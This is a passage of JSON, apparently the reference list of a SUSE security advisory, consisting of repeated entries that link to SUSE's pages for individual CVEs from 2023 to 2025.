"summary": "SUSE CVE CVE-2023-53819 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53819/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53821 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53821/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53823 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53823/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53825 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53825/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53828 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53828/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53831 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53831/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53834 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53834/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53836 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53836/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53839 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53839/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53841 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53841/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53842 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53842/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53843 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53843/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53844 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53844/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53846 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53846/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53847 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53847/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53848 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53848/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53850 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53850/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53851 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53851/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53852 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53852/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53855 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53855/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53856 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53856/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53857 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53857/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53858 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53858/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53860 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53860/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53861 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53861/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53863 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53863/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53864 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53864/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53865 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53865/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53989 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53989/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53992 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53992/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53994 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53994/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53995 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53995/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53996 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53996/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53997 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53997/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53998 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53998/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53999 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53999/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54000 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54000/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54001 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54001/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54005 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54005/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54006 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54006/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54008 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54008/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54013 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54013/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54014 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54014/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54016 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54016/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54017 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54017/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54019 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54019/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54022 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54022/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54023 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54023/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54025 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54025/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54026 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54026/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54027 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54027/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54030 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54030/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54031 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54031/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54032 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54032/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54035 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54035/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54037 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54037/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54038 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54038/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54042 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54042/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54045 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54045/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54048 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54048/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54049 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54049/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54051 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54051/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54052 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54052/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54060 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54060/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54064 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54064/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54066 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54066/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54067 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54067/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54069 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54069/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54070 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54070/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54072 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54072/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54076 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54076/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54080 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54080/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54081 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54081/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54083 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54083/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54088 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54088/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54089 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54089/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54091 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54091/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54092 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54092/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54093 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54093/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54094 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54094/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54095 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54095/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54096 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54096/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54099 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54099/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54101 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54101/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54104 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54104/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54106 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54106/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54112 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54112/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54113 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54113/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54115 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54115/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54117 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54117/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54121 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54121/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54125 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54125/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54127 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54127/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54133 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54133/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54134 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54134/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54135 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54135/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54136 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54136/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54137 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54137/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54140 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54140/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54141 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54141/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54142 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54142/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54143 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54143/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54145 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54145/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54148 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54148/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54149 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54149/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54153 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54153/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54154 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54154/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54155 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54155/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54156 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54156/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54164 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54164/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54166 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54166/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54169 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54169/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54170 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54170/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54171 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54171/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54172 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54172/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54173 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54173/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54177 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54177/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54178 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54178/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54179 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54179/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54181 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54181/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54183 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54183/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54185 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54185/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54189 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54189/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54194 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54194/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54201 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54201/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54204 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54204/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54207 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54207/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54209 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54209/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54210 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54210/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54211 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54211/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54215 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54215/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54219 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54219/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54220 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54220/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54221 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54221/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54223 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54223/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54224 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54224/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54225 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54225/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54227 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54227/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54229 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54229/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54230 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54230/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54235 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54235/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54240 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54240/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54241 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54241/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54246 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54246/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54247 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54247/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54251 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54251/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54253 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54253/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54254 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54254/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54255 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54255/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54258 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54258/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54261 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54261/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54263 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54263/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54264 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54264/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54266 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54266/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54267 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54267/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54271 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54271/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54276 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54276/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54278 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54278/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54281 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54281/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54282 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54282/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54283 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54283/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54285 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54285/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54289 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54289/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54291 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54291/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54292 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54292/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54293 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54293/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54296 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54296/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54297 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54297/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54299 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54299/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54300 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54300/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54302 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54302/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54303 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54303/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54304 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54304/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54309 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54309/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54312 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54312/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54313 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54313/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54314 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54314/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54315 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54315/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54316 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54316/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54318 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54318/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54319 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54319/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54322 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54322/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54324 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54324/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54326 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54326/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2024-26944 page",
"url": "https://www.suse.com/security/cve/CVE-2024-26944/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2024-27005 page",
"url": "https://www.suse.com/security/cve/CVE-2024-27005/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2024-42103 page",
"url": "https://www.suse.com/security/cve/CVE-2024-42103/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2024-53070 page",
"url": "https://www.suse.com/security/cve/CVE-2024-53070/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2024-53149 page",
"url": "https://www.suse.com/security/cve/CVE-2024-53149/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-22047 page",
"url": "https://www.suse.com/security/cve/CVE-2025-22047/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-37813 page",
"url": "https://www.suse.com/security/cve/CVE-2025-37813/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38243 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38243/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38321 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38321/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38322 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38322/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38379 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38379/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38539 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38539/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38728 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38728/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-39689 page",
"url": "https://www.suse.com/security/cve/CVE-2025-39689/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-39813 page",
"url": "https://www.suse.com/security/cve/CVE-2025-39813/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-39829 page",
"url": "https://www.suse.com/security/cve/CVE-2025-39829/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-39880 page",
"url": "https://www.suse.com/security/cve/CVE-2025-39880/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-39890 page",
"url": "https://www.suse.com/security/cve/CVE-2025-39890/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-39913 page",
"url": "https://www.suse.com/security/cve/CVE-2025-39913/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-39977 page",
"url": "https://www.suse.com/security/cve/CVE-2025-39977/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40006 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40006/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40024 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40024/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40033 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40033/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40042 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40042/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40053 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40053/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40081 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40081/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40097 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40097/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40102 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40102/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40106 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40106/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40123 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40123/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40134 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40134/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40135 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40135/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40153 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40153/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40158 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40158/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40160 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40160/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40167 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40167/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40170 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40170/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40178 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40178/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40179 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40179/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40187 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40187/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40190 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40190/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40202 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40202/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40211 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40211/"
},
{
"category": "self",
